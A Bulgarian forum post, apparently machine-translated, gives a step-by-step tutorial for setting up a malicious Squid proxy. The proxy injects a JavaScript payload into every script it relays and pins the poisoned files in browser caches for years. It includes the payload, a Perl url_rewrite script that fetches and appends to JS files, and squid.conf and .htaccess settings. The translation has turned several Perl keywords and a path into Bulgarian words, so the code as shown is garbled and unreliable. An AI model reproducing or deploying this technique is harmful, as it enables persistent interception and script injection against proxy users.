Тази публикация беше последно редактирана от Мо Сяоуен на 7.06.2015 23:19
Това може да се постигне чрез просто модифициране на конфигурацията на SQUID
Какво е SQUID?
Squid е софтуер, който кешира интернет данни, получава заявки за изтегляне от потребители и автоматично обработва изтеглените данни. Когато потребител иска да изтегли начална страница, той може да изпрати заявка до Squid, да поиска от Squid да я изтегли от негово име, след което Squid се свързва с уебсайта и иска началната страница, след което изпраща началната страница на потребителя, като запазва резервно копие. Когато други потребители кандидатстват за същата страница, Squid веднага изпраща запазената архивна копия на потребителя, така че потребителят да усеща, че скоростта е доста бърза. Squid може да прокси протоколи като HTTP, FTP, GOPHER, SSL и WAIS, а Squid може да ги обработва автоматично, а вие можете да настроите Squid според нуждите си, за да филтрира нежелани неща.
Squid може да работи в много операционни системи, като AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 и др.
Реализацията е много проста:
1. Инсталирайте Squid на един Linux сървър.
2. Модифицираме кода на сървъра, вмъкнете част от нашия код във всички изпратени javascrip и го изпратете.
3. Задайте кеша на нашия модифициран js файл възможно най-високо.
Този метод се прилага и за уебсайтове с активиран SSL – ако сайтът зареди несигурен ресурс (като jquery за HTTP сайт), повечето браузъри ще дадат предупреждение, но малко хора обръщат внимание.
Chema каза, че над 5 000 души са използвали неговия прокси няколко дни след като го е пуснал, и повечето са го използвали, за да правят лоши неща, защото са го използвали, така че са мислели, че е анонимен и безопасен, но никога не са очаквали, че и прокси сървърът ще прави лоши неща.
Направете своя злонамерен прокси сървър
Ако вече имате Squid прокси сървър, ще ви трябва и уеб сървър като Apache.
Стъпка 1 Създаване на полезен товар
Използвам прост скрипт като демонстрация, за да насоча всички хипервръзки към моя уебсайт.
/etc/squid/payload.js
[mw_shl_code=javascrip премахни t, true]for(var i=0; i<document.getElementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Стъпка 2 Напишете скрипт, който да зарази всички JS файлове
/etc/squid/poison.pl
[mw_shl_code=perl, вярно]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
докато (<>)
{
chomp $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
печат "http://127.0.0.1:80/tmp/$pid-$count.js";
}
Друго
{
печатай "$_";
}
$count++;
}[/mw_shl_code]
Този скрипт използва wget, за да получи оригиналния javascrip на страницата и да премахне t-файла, след което добави кода в /etc/squid/payload.js и изпрати модифицирания файл на клиента, докато трябва да създадеш директорията /var/www/tmp и да позволиш на squid да пише файлове в нея. Тази директория съхранява модифицираните js файлове.
Стъпка 3 Комбинирайте горния сценарий със Squid
Добавете го в /etc/squid/squid.conf
[mw_shl_code=html, вярно]url_rewrite_program /etc/калмар/poison.pl[/mw_shl_code]
Стъпка 4: Направете кеша никога да не се проваля
/var/www/tmp/.htaccess
[mw_shl_code=html, вярно] ExpiresActive On
ExpiresDefault "достъп плюс 3000 дни"[/mw_shl_code]
Това ще каже на Apache да му даде дълъг срок на изтичане, докато потребителят почисти кеша си.
Ако свържеш този прокси, кликването на която и да е хипервръзка ще те пренасочи към моя уебсайт, а кешът ще съществува дори ако не го използваш по-късно. Току-що използвах неагресивен полезен товар и с този метод хакерите могат да направят много повече. Затова си напомняйте на себе си и приятелите си да бъдете внимателни с използването на безплатни проксита.
|
Публикувано в 19.01.2015 г. 2:34:56 ч.
|
|
|
|
Публикувано в 19.01.2015 г. 8:48:45 ч.
|
Хазяин|
Публикувано в 20.01.2015 г. 14:36:06 ч.
|
